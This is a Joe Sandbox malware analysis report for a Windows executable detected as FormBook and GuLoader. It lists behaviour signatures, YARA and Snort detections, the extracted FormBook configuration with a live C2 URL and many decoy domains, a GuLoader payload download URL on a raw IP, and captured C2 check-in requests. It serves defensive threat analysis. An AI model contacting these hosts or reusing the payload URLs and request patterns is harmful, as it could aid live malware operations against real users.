Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jU0hAXFL0k.exe

Overview

General Information

Sample Name:jU0hAXFL0k.exe
Analysis ID:1326341
MD5:6e8215eee3034d6dcf18d79d397e5715
SHA1:5612bff0830a9a025eb35cf7c054d2062745d1b9
SHA256:ac4761c259daede4b4efb78816c98fb56344e381bb56d69ea897c30c9899bf39
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • jU0hAXFL0k.exe (PID: 6044 cmdline: C:\Users\user\Desktop\jU0hAXFL0k.exe MD5: 6E8215EEE3034D6DCF18D79D397E5715)
    • jU0hAXFL0k.exe (PID: 8580 cmdline: C:\Users\user\Desktop\jU0hAXFL0k.exe MD5: 6E8215EEE3034D6DCF18D79D397E5715)
      • explorer.exe (PID: 4928 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • autofmt.exe (PID: 6440 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: ABC9F7DAB410FE452D2D90C9960077BE)
        • cmd.exe (PID: 9200 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • cmd.exe (PID: 8460 cmdline: /c del "C:\Users\user\Desktop\jU0hAXFL0k.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nightoracle.com/rs10/"], "decoy": ["starryallure.com", "mania-31.online", "baba-bt-top1.buzz", "jwilkinsartscapeinc.com", "tallerhazop.com", "lulu013.com", "pontoimediato.com", "stmc-company.com", "thesoftwarepractitioner.com", "makemoneywithsherrie.com", "algaroba.com", "smartbookmarks.info", "burneysaw.com", "fftsxxx.top", "hvr998.com", "sofisticars.store", "clickit.fun", "couches-sofas-16683.bond", "ikkasolutions.com", "oakvisa.com", "totalkfood.com", "guillaumecarreau.com", "biomagnetismocolombia.com", "jrszhiboz.com", "rewmio.xyz", "willowliy.com", "calm-plants.com", "robertjamesfineclothing.com", "wgardsgm.live", "dngbdk9jpusxpwr.com", "slycepicklegear.com", "mtauratarnt.com", "simolified.com", "mekkamochi.com", "deeprootedleader.com", "container-houses-vn.click", "roundaboutlogistics.com", "m-baer.com", "electric-cars-19095.bond", "destinydinos.com", "taxretentionstrategiesgroup.com", "zg9tywlubmftzw5ldzi0mdm.com", "cleaning-products-29334.bond", "metaastrologia.com", "practicaloutsource.com", "w1nb74.top", "just-one.info", "cryptarrow.com", "omarshafie.online", "latitudeinformatics.com", "fhstbanknigeria.com", "hdlive7.live", "laserhairremovalkit.com", "into-org.com", "kzjsm.com", "juara102-azura.com", "digitsum.com", "cabins-prefab.online", "allisonparlinart.com", "cpsgrantstream.com", "everythingbutthetruck.com", "w6k3v.com", "alfarizkigrup.com", "gs3ekdj3ixe.asia"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 16 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      Timestamp:192.168.11.3023.227.38.7450130802031412 10/16/23-11:30:34.341610
      SID:2031412
      Source Port:50130
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.303.33.130.19050138802031412 10/16/23-11:32:59.120800
      SID:2031412
      Source Port:50138
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.3023.227.38.7450133802031412 10/16/23-11:31:15.754112
      SID:2031412
      Source Port:50133
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.30104.21.19.22750127802031412 10/16/23-11:29:13.108417
      SID:2031412
      Source Port:50127
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.301.1.1.158176532023883 10/16/23-11:29:33.045985
      SID:2023883
      Source Port:58176
      Destination Port:53
      Protocol:UDP
      Classtype:Potentially Bad Traffic
      Timestamp:192.168.11.30104.247.82.5150142802031412 10/16/23-11:34:01.586007
      SID:2031412
      Source Port:50142
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.3066.96.162.13350134802031412 10/16/23-11:31:36.580336
      SID:2031412
      Source Port:50134
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.30208.91.197.2750146802031412 10/16/23-11:34:22.055359
      SID:2031412
      Source Port:50146
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.30172.67.210.17650147802031412 10/16/23-11:34:44.313076
      SID:2031412
      Source Port:50147
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.30104.247.82.9050135802031412 10/16/23-11:31:57.444382
      SID:2031412
      Source Port:50135
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.30103.224.212.21050129802031412 10/16/23-11:29:52.922186
      SID:2031412
      Source Port:50129
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.30172.67.193.17750141802031412 10/16/23-11:33:40.532597
      SID:2031412
      Source Port:50141
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.30172.67.148.6850128802031412 10/16/23-11:29:33.638445
      SID:2031412
      Source Port:50128
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.30103.72.68.12850125802855192 10/16/23-11:27:46.501036
      SID:2855192
      Source Port:50125
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Found malware configuration
      Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.nightoracle.com/rs10/"], "decoy": ["starryallure.com", "mania-31.online", "baba-bt-top1.buzz", "jwilkinsartscapeinc.com", "tallerhazop.com", "lulu013.com", "pontoimediato.com", "stmc-company.com", "thesoftwarepractitioner.com", "makemoneywithsherrie.com", "algaroba.com", "smartbookmarks.info", "burneysaw.com", "fftsxxx.top", "hvr998.com", "sofisticars.store", "clickit.fun", "couches-sofas-16683.bond", "ikkasolutions.com", "oakvisa.com", "totalkfood.com", "guillaumecarreau.com", "biomagnetismocolombia.com", "jrszhiboz.com", "rewmio.xyz", "willowliy.com", "calm-plants.com", "robertjamesfineclothing.com", "wgardsgm.live", "dngbdk9jpusxpwr.com", "slycepicklegear.com", "mtauratarnt.com", "simolified.com", "mekkamochi.com", "deeprootedleader.com", "container-houses-vn.click", "roundaboutlogistics.com", "m-baer.com", "electric-cars-19095.bond", "destinydinos.com", "taxretentionstrategiesgroup.com", "zg9tywlubmftzw5ldzi0mdm.com", "cleaning-products-29334.bond", "metaastrologia.com", "practicaloutsource.com", "w1nb74.top", "just-one.info", "cryptarrow.com", "omarshafie.online", "latitudeinformatics.com", "fhstbanknigeria.com", "hdlive7.live", "laserhairremovalkit.com", "into-org.com", "kzjsm.com", "juara102-azura.com", "digitsum.com", "cabins-prefab.online", "allisonparlinart.com", "cpsgrantstream.com", "everythingbutthetruck.com", "w6k3v.com", "alfarizkigrup.com", "gs3ekdj3ixe.asia"]}
      Multi AV Scanner detection for submitted file
      Source: jU0hAXFL0k.exeVirustotal: Detection: 45%Perma Link
      Source: jU0hAXFL0k.exeReversingLabs: Detection: 31%
      Yara detected FormBook
      Source: Yara matchFile source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Antivirus / Scanner detection for submitted sample
      Source: jU0hAXFL0k.exeAvira: detected
      Antivirus detection for URL or domain
      Source: http://www.fftsxxx.top/rs10/?wr5xXxu=0iJ8M3XqpMfSbPzaPESpQVivP40tWom07G4vKfCAiNjWSIJ0IxOBhHolE1vkpwp+8Hu6&CZF=FZ4P3Z3PkfeAvira URL Cloud: Label: phishing
      Multi AV Scanner detection for domain / URL
      Source: http://103.72.68.128/pcd/zkltfDHOiVw63.binVirustotal: Detection: 12%Perma Link
      Source: jU0hAXFL0k.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: jU0hAXFL0k.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: jU0hAXFL0k.exe, 0000000C.00000001.2063871128101.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP source: jU0hAXFL0k.exe, 0000000C.00000003.2064065483562.00000000376E4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: jU0hAXFL0k.exe, 0000000C.00000003.2064065483562.00000000376E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe
      Source: Binary string: mshtml.pdbUGP source: jU0hAXFL0k.exe, 0000000C.00000001.2063871128101.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: cmd.pdb source: cmd.exe
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeCode function: 5_2_004062DD FindFirstFileA,FindClose,5_2_004062DD
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeCode function: 5_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,5_2_004057A2
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeCode function: 5_2_00402765 FindFirstFileA,5_2_00402765
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D7589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,15_2_00D7589A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D74EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,15_2_00D74EC1
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D83E66 FindFirstFileW,FindNextFileW,FindClose,15_2_00D83E66
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D70207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,15_2_00D70207
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D6532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,15_2_00D6532E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi15_2_02DE6CEB

      Networking

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.210 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 172.67.193.177 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.27 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.133 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 104.21.19.227 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 172.67.210.176 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 104.247.82.51 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 172.67.148.68 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 104.247.82.90 80Jump to behavior
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2855192 ETPRO TROJAN GuLoader Encoded Binary Request M2 192.168.11.30:50125 -> 103.72.68.128:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50127 -> 104.21.19.227:80
      Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.11.30:58176 -> 1.1.1.1:53
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50128 -> 172.67.148.68:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50129 -> 103.224.212.210:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50130 -> 23.227.38.74:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50133 -> 23.227.38.74:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50134 -> 66.96.162.133:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50135 -> 104.247.82.90:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50138 -> 3.33.130.190:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50141 -> 172.67.193.177:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50142 -> 104.247.82.51:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50146 -> 208.91.197.27:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50147 -> 172.67.210.176:80
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: www.nightoracle.com/rs10/
      Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: global trafficHTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=aZ/lcGP+1FkvlwdkDULp+PnMy+vqJpYUHhxtLH0JyJK/Dwy50YtC4wzl69ZsBTKZeIRM HTTP/1.1Host: www.juara102-azura.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?wr5xXxu=0iJ8M3XqpMfSbPzaPESpQVivP40tWom07G4vKfCAiNjWSIJ0IxOBhHolE1vkpwp+8Hu6&CZF=FZ4P3Z3Pkfe HTTP/1.1Host: www.fftsxxx.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=SxqHGPQaAl7yFZn58Kwa4D8rXi7vUXAn+pZ+h1ux2Xs7o9rzQOK5UHTSqMwI3eALG/2g HTTP/1.1Host: www.nightoracle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=Jl6D3AYJMpsoqEFrbY4lXgI+CqA8jAhhEBHBOp3JwZxwH/kCFGDnFMsoz66PDEG/ZKuf HTTP/1.1Host: www.thesoftwarepractitioner.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=uoL10Qcd0eLYS7Ve2hB0LYPAWS6gq5lEHn4a3bybbvdgEh6IH9sFuMB9DUK4ZLPCWxvn HTTP/1.1Host: www.laserhairremovalkit.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?wr5xXxu=uVlfmkRF+iVw/eVgHGJAPYTHwOK+gja5lCenY26JIHiuhJtAWLwToWVuFNjfQJtXy5r3&CZF=FZ4P3Z3Pkfe HTTP/1.1Host: www.omarshafie.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=KT0d1e3BBcKFYE425gVaQdIZfgENHgjmY2M2c9Bsa4V4Og8kkivQcwUvXP4wlMvPRBCl HTTP/1.1Host: www.electric-cars-19095.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?wr5xXxu=tDFPqbQSWha/CSL3nrPGL7FBUiRZeUezwZrLB2afcgfzzGJsCl08dK+Vf/r9oM/AKN8c&CZF=FZ4P3Z3Pkfe HTTP/1.1Host: www.latitudeinformatics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?wr5xXxu=OJwcZLoBL0+y/b1nUKgyY9euQNPYkahm34mOnyUSFfzLd1inlK2E8ylg3tCjMnF+BDY5&CZF=FZ4P3Z3Pkfe HTTP/1.1Host: www.hdlive7.liveConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=h9cyBphf9TZy/NiZOY7V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXowJmn7XnCFt HTTP/1.1Host: www.robertjamesfineclothing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?wr5xXxu=tnlFoTupmPEe2FuJuv6YyFNcBynACc4EqLKIKpHaKJfweHMHroc5yQmaieiVC2idvHp8&CZF=FZ4P3Z3Pkfe HTTP/1.1Host: www.practicaloutsource.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?wr5xXxu=pPtLjK/UsFcChRXxT0x+WEjNRlgjs/QTeyWPHt+QyMOk/3bi5sdkKHli51cvqOL5Mhkn&L0Dp=Ifmdxb8 HTTP/1.1Host: www.mtauratarnt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 103.72.68.128 103.72.68.128
      Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
      Source: global trafficHTTP traffic detected: GET /pcd/zkltfDHOiVw63.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: 103.72.68.128Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Oct 2023 09:29:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ES6qWQ3CPXdPIdfdI9zYyCmb73rUtvrX%2F%2Fnyne9bZeX5Xn3hRgtL2LEh0mhaStAWviGkhpGZn44kD1Ih%2BhMvRsXuTZQsUxSwjiIjux%2FE3lyO1sDkR8wGr9QYNoB7ruoVn24%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 816f4731cb992f35-LAXalt-svc: h3=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3a 20 54 68 69 73 20 70 61 67 65 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 41 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 42 61 69 64 75 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 79 73 74 65 6d 2d 75 69 2c 20 27 53 65 67 6f 65 20 55 49 27 2c 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 3c 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 20 63 6f 6c 6f 72 3a 20 72 65 64 22 3e 0d 0a 20 20 20 Data Ascii: 4bf<!DOCTYPE html><html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width" /> <title>404: This page could not be found</title> </head> <body> <script rel="nofollow" language="javascript" type="text/javascript" src="/Aquery.js"></script>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 16 Oct 2023 09:30:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4517Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 16 Oct 2023 09:30:49 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EwDGESFM00gACgrIKYzV%2Bi6Ot6dcvfzCh4HacvjyBdTdtZN1kUc4p7nogLAy%2BThEuU9M%2FizgXBKpSmchVSmw%2BDiMQ8FveVHe9lz7cA%2F04pOsdC64Vx58BzrdnZXzGIYv4M52rNTkiGnp6rpjkBZFlLY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=11.000156Server: cloudflareCF-RAY: 816f48ad2f172ac3-LAXalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 